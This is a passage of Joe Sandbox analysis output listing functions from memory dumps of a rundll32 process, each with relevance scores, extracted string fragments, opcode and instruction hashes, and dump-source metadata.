                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq$|7Dp
                                                                                                                                                                                                                                          • API String ID: 0-3282306966
                                                                                                                                                                                                                                          • Opcode ID: bcd8e2e8f63582700890b1669e50dad6976dfb275c81f87008fbc1eab6004155
                                                                                                                                                                                                                                          • Instruction ID: 8cc26cf100102f66ecd6d6ccc1a55f99a2c1aade64a6b445c6d35834ac0d60ea
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bcd8e2e8f63582700890b1669e50dad6976dfb275c81f87008fbc1eab6004155
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69C1C0B0B002258FC714DF69D44497F7BE7FF89210B248869E4469B395EF34ED428B91
                                                                                                                                                                                                                                          Function 05041630 Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $dq$$dq
                                                                                                                                                                                                                                          • API String ID: 0-2340669324
                                                                                                                                                                                                                                          • Opcode ID: ec3278179c01c6e5221c320bd836aef819a623223980ef9c4a61e4e8f7a93cef
                                                                                                                                                                                                                                          • Instruction ID: 9a1aae957dbdd0e59e9bbe2b76bc30708bb1b7a3d88c9a167ff1ed7348cc5be8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec3278179c01c6e5221c320bd836aef819a623223980ef9c4a61e4e8f7a93cef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F451CDB1B002099FCB14DF78E8546AF7BF6FBC8250B14817AD909EB354DA309D42CB91
                                                                                                                                                                                                                                          Function 0504A228 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq$(hq
                                                                                                                                                                                                                                          • API String ID: 0-2483692461
                                                                                                                                                                                                                                          • Opcode ID: 284643315a382748725042e062caaac1862046c44d49d8bc2a70cb0de0d7387e
                                                                                                                                                                                                                                          • Instruction ID: 2eb042eb2908168c358c263739688d93023e19882ecaeb7773f75e5efa079977
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 284643315a382748725042e062caaac1862046c44d49d8bc2a70cb0de0d7387e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83412770B482549FD715CF68D854B9EBFF2EF89210F1480A9E805BB391CB35AD02CBA0
                                                                                                                                                                                                                                          Function 050430EC Relevance: 2.6, Strings: 2, Instructions: 137COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq$LRdq
                                                                                                                                                                                                                                          • API String ID: 0-2668683976
                                                                                                                                                                                                                                          • Opcode ID: edd2f433a649f46b68d566c749852f455a48709a5512ffb5815094b9c9a9ad54
                                                                                                                                                                                                                                          • Instruction ID: dba32814bce35d8c6ed6bd4c3030dfc1a05b5e154cc6a0658da1e7d404fd56dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: edd2f433a649f46b68d566c749852f455a48709a5512ffb5815094b9c9a9ad54
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B4111B0B042145FEB189B38A8247BF7AE7EFC5204F049879E906DB395DE389D418B91
                                                                                                                                                                                                                                          Function 0504EA88 Relevance: 2.6, Strings: 2, Instructions: 122COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq$T;Dp
                                                                                                                                                                                                                                          • API String ID: 0-2939713827
                                                                                                                                                                                                                                          • Opcode ID: b1ae094dc80eb90c318c390aa5abc1c053d5498935c6ef577056a3fa6c03db02
                                                                                                                                                                                                                                          • Instruction ID: d1dd98fa926ad43c0acbfae80e34571dd49775a7febaaea1cdac042e3b84278d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1ae094dc80eb90c318c390aa5abc1c053d5498935c6ef577056a3fa6c03db02
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8319C71B002154FDB089A7DE85596FBBEBFFC46507144539E906C7390DE38EC068BA6
                                                                                                                                                                                                                                          Function 0504E1F0 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (Aiq
                                                                                                                                                                                                                                          • API String ID: 0-2795974270
                                                                                                                                                                                                                                          • Opcode ID: b26b186799426a918571795ec6a666bb2fd4cebb88c33df80577dd14acf5cd69
                                                                                                                                                                                                                                          • Instruction ID: 268a7c564d654a62a75e8a37f9da04a7db2b2a354562d767dc7fa554df22d9cb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b26b186799426a918571795ec6a666bb2fd4cebb88c33df80577dd14acf5cd69
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99C18FB0B102199FCB55DFA9D594AAEBBF6BF84200F144429E806EB394EF749C42CF51
                                                                                                                                                                                                                                          Function 050499B8 Relevance: 1.6, Strings: 1, Instructions: 324COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq
                                                                                                                                                                                                                                          • API String ID: 0-4060669308
                                                                                                                                                                                                                                          • Opcode ID: 82a35e631b0629a312b7309081b3b11ac49d1490b3b2c1b7f7b093925a005248
                                                                                                                                                                                                                                          • Instruction ID: 29ada272a8687874a374a933efc0ea7ee82299db16734ab8f640d40c7af7411a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82a35e631b0629a312b7309081b3b11ac49d1490b3b2c1b7f7b093925a005248
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DE14874A003598FCB45CFA8D988A9DBBF2FF89300F1485A5D809AB265DB74ED45CF90
                                                                                                                                                                                                                                          Function 074F9FD0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 074F9FF8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888917227.00000000074F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074F0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_74f0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 6842923-0
                                                                                                                                                                                                                                          • Opcode ID: dcac9e86a0bd8b61512f0f3997965e49f78e9848c78964b70ca40e90a63daf57
                                                                                                                                                                                                                                          • Instruction ID: 7822ed5183bed9735d524ac2a69eafd861820c67a5f293963126edca89146b32
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dcac9e86a0bd8b61512f0f3997965e49f78e9848c78964b70ca40e90a63daf57
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60118CB5B01246DFEB14CE34E4403EE7BA2EB4B324F14C15ACB0963390DB359409CB90
                                                                                                                                                                                                                                          Function 074F9FE0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 074F9FF8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888917227.00000000074F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074F0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_74f0000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 6842923-0
                                                                                                                                                                                                                                          • Opcode ID: 444c40e1d634fe6abd7cd2c40dd7c0d17e2eeb22207f20dcfe388f70519e1070
                                                                                                                                                                                                                                          • Instruction ID: 3f3892c128fad2e0ad4d4a42e870f86334198fd28b042ae07c6c63188cae93af
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 444c40e1d634fe6abd7cd2c40dd7c0d17e2eeb22207f20dcfe388f70519e1070
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A111E775B01205DFEB14CE78F5403EDB7A2EB8B324F14C526DB1963390D6369909CB50
                                                                                                                                                                                                                                          Function 05041080 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq
                                                                                                                                                                                                                                          • API String ID: 0-4060669308
                                                                                                                                                                                                                                          • Opcode ID: a73a3470f8ba7cb6651bcc4d60a8d7d0bcd339e4d6a98fcddb64ef4b018af0ef
                                                                                                                                                                                                                                          • Instruction ID: 11f9b7e04d1716754b8055c230925d262fb169730b12c051e2fe69993ea9dfe0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a73a3470f8ba7cb6651bcc4d60a8d7d0bcd339e4d6a98fcddb64ef4b018af0ef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A719271B002189BDB149BB9D854BAEBAE7BFC8201F148039D606EB3A4DF74DD42CB51
                                                                                                                                                                                                                                          Function 050468E0 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq
                                                                                                                                                                                                                                          • API String ID: 0-4060669308
                                                                                                                                                                                                                                          • Opcode ID: 7f3063facabf3d28e03affa7b5cc5033cb801355e988dda31a058341031e0e6a
                                                                                                                                                                                                                                          • Instruction ID: 0e9a0a9f1a35b966b35b20604ae63283679cf5dcb9f615101072543993be14be
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f3063facabf3d28e03affa7b5cc5033cb801355e988dda31a058341031e0e6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1611A7AB002059FCB11CF69D8809AABBF6FF8935071584AAE509DB321DB31E915CB90
                                                                                                                                                                                                                                          Function 05046048 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq
                                                                                                                                                                                                                                          • API String ID: 0-4060669308
                                                                                                                                                                                                                                          • Opcode ID: bed88279b6b4d81a4ebf9d64f3290170a4d1c03893886da0df8814bb6610e743
                                                                                                                                                                                                                                          • Instruction ID: 48371352f043a15add13cb8547f31db0b2762759d19106b11eb9c925312dbbef
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bed88279b6b4d81a4ebf9d64f3290170a4d1c03893886da0df8814bb6610e743
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87714FB1A043189FDB05DBE8C8606DEBFF6EF99301F10402AD606677A0DF396D459B62
                                                                                                                                                                                                                                          Function 0504E7D8 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: L<Dp
                                                                                                                                                                                                                                          • API String ID: 0-434626384
                                                                                                                                                                                                                                          • Opcode ID: 95a84ca9e73b68ef8bd57e64985717ae2408d668b9fd8ad68dea32b712996fac
                                                                                                                                                                                                                                          • Instruction ID: 8122eea0cf541aacc4fd38d51b52e969cf2c906fbf24d7f1fbeb22c2912a577e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95a84ca9e73b68ef8bd57e64985717ae2408d668b9fd8ad68dea32b712996fac
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9619370B002049FCB54DF79E595A6E7BFBBF88600B248429E446D7394DF78AC418FA6
                                                                                                                                                                                                                                          Function 05046C10 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: |7Dp
                                                                                                                                                                                                                                          • API String ID: 0-3852060688
                                                                                                                                                                                                                                          • Opcode ID: a0578693aad24f2e224fa6cacc822cf4acd42a75d79be0bd3967c04146ddd19c
                                                                                                                                                                                                                                          • Instruction ID: a23bbd91b579f1609e6baa8c7825873ac37aef0ad531f1bfa81d12b574194138
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0578693aad24f2e224fa6cacc822cf4acd42a75d79be0bd3967c04146ddd19c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8516EB0B002259FCB44DB69D944AAEBBF2FF89211B11C569E805DB395EB31ED41CB90
                                                                                                                                                                                                                                          Function 0504C4D8 Relevance: 1.4, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq
                                                                                                                                                                                                                                          • API String ID: 0-4060669308
                                                                                                                                                                                                                                          • Opcode ID: 9c94c3d935c31444fc0740735de0e67dfcb4d0f772a9932c3a5c0bb4e33fceef
                                                                                                                                                                                                                                          • Instruction ID: b327556427d7b5a9102757b106ec8c8e43714e1303e58125df0b29ee26f11803
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c94c3d935c31444fc0740735de0e67dfcb4d0f772a9932c3a5c0bb4e33fceef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C151D1753047518FD325DB34E558A6EBBE2FF85201708CAB9D44A8B665CE34EC46CB90
                                                                                                                                                                                                                                          Function 0504E428 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (Aiq
                                                                                                                                                                                                                                          • API String ID: 0-2795974270
                                                                                                                                                                                                                                          • Opcode ID: 09346a3ab26c5dcfc6eae5bd0ffbba074b6760072980b656729a865034e291fd
                                                                                                                                                                                                                                          • Instruction ID: d55abdbc7988ed5821b30d86e84d41e4f3d4e684032db283ed9a431a40d435b9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09346a3ab26c5dcfc6eae5bd0ffbba074b6760072980b656729a865034e291fd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C24181B0B102159FDB54DF74E954AAEBBF6BF88240F104529E806AB390EF749C01CF95
                                                                                                                                                                                                                                          Function 0504E7C7 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: L<Dp
                                                                                                                                                                                                                                          • API String ID: 0-434626384
                                                                                                                                                                                                                                          • Opcode ID: 5bbd6d5a0d006723ac3db2b87f8ac89927c5e26783ca32acc97f0fdff33e4438
                                                                                                                                                                                                                                          • Instruction ID: 32e1a9045171dd4588efbaaafbd30c201f887f947cffd80609137b7ac12fee89
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bbd6d5a0d006723ac3db2b87f8ac89927c5e26783ca32acc97f0fdff33e4438
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB41C871B001045FCB44DF79D5A4A7EBBFBBF88600B148529E406E7394DE74AC058FA6
                                                                                                                                                                                                                                          Function 050485B0 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq
                                                                                                                                                                                                                                          • API String ID: 0-4060669308
                                                                                                                                                                                                                                          • Opcode ID: 90aace1e80d2ea62c255e840757216b4e57d939e7bbe45732006fc9191ab3058
                                                                                                                                                                                                                                          • Instruction ID: 9eb17954a6185a11946012858a3d471b8d4d2c99e6fa1a08b41cbd78f9bd120b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90aace1e80d2ea62c255e840757216b4e57d939e7bbe45732006fc9191ab3058
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D04179B4B006058FDB54CF29D480A6EBBF2FF89310B15C9A9D45AAB751CB34E841CF94
                                                                                                                                                                                                                                          Function 05040C1C Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq
                                                                                                                                                                                                                                          • API String ID: 0-4060669308
                                                                                                                                                                                                                                          • Opcode ID: c4dc0fb3d5b2b07b6569c9e3284ec36361c868ecbb6b5f8d55d4a9441d7e18f5
                                                                                                                                                                                                                                          • Instruction ID: 8cc02fc21139ee007558264ad7324d3262ae05fe0fe72444c04eb692007cc8a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4dc0fb3d5b2b07b6569c9e3284ec36361c868ecbb6b5f8d55d4a9441d7e18f5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2310770B082445BE719A739A86877E3BF69F85300F14847AD502EB382CE789C45CB91
                                                                                                                                                                                                                                          Function 05043719 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LRdq
                                                                                                                                                                                                                                          • API String ID: 0-3106745678
                                                                                                                                                                                                                                          • Opcode ID: 58ac8e0b1edaf1ab57624b5f41b9f60205549d8d8b6ba546eae0af809595596d
                                                                                                                                                                                                                                          • Instruction ID: b5d2ee5b4e27ff7b045dbcb8694a1f3d30c53ec0f851c6e1acb122058555b1f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58ac8e0b1edaf1ab57624b5f41b9f60205549d8d8b6ba546eae0af809595596d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E2100B1B002555FDB58DA24B858BBF77EBFF84208F00683EE846C7295EB3499458B90
                                                                                                                                                                                                                                          Function 050445C8 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (hq
                                                                                                                                                                                                                                          • API String ID: 0-4060669308
                                                                                                                                                                                                                                          • Opcode ID: 19273de9185bf72becac7020c2d88a983e6a203e48f6d9fbaa93d6f1efc8382e
                                                                                                                                                                                                                                          • Instruction ID: df284d33540db482db2c2e96d76b2b8b1423ac7007b16a2b8cd756b02b93f0cc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19273de9185bf72becac7020c2d88a983e6a203e48f6d9fbaa93d6f1efc8382e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FF2103753082009FDB04EB2DE84496E7BE7EFCA31031544AAE149CB761DE25EC468BA2
                                                                                                                                                                                                                                          Function 0504AAA7 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: m
                                                                                                                                                                                                                                          • API String ID: 0-3775001192
                                                                                                                                                                                                                                          • Opcode ID: 143a11a943e27632389918c49f24fbc7e8100effc489530f378a82892d269c0a
                                                                                                                                                                                                                                          • Instruction ID: 6114a91ecfbcf4d47a667fdfdc5947fbfce0bf80d2fb47df353d89ad40b9b4e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 143a11a943e27632389918c49f24fbc7e8100effc489530f378a82892d269c0a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C2180B4E053489FCB05DBA8D4949ADBFF2EF49310F40449AD484AB352DB346A44CF92
                                                                                                                                                                                                                                          Function 0504AF10 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000004.00000003.1888887920.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_4_3_5040000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: \;dq
                                                                                                                                                                                                                                          • API String ID: 0-2922547838
                                                                                                                                                                                                                                          • Opcode ID: b43834028be654d1c39a048b662f2a03a04d4c47d028fef433c23ff201442cc9
                                                                                                                                                                                                                                          • Instruction ID: 43bdfc84e56844ce6d37e7f64667be756f7ed75d67e2cd01de2f6ccb9a0e7ded
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b43834028be654d1c39a048b662f2a03a04d4c47d028fef433c23ff201442cc9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3011A0B23442054F9B549AAEB49496FF7DBEFC8265314803BE50DC7B54DF60EC004B90
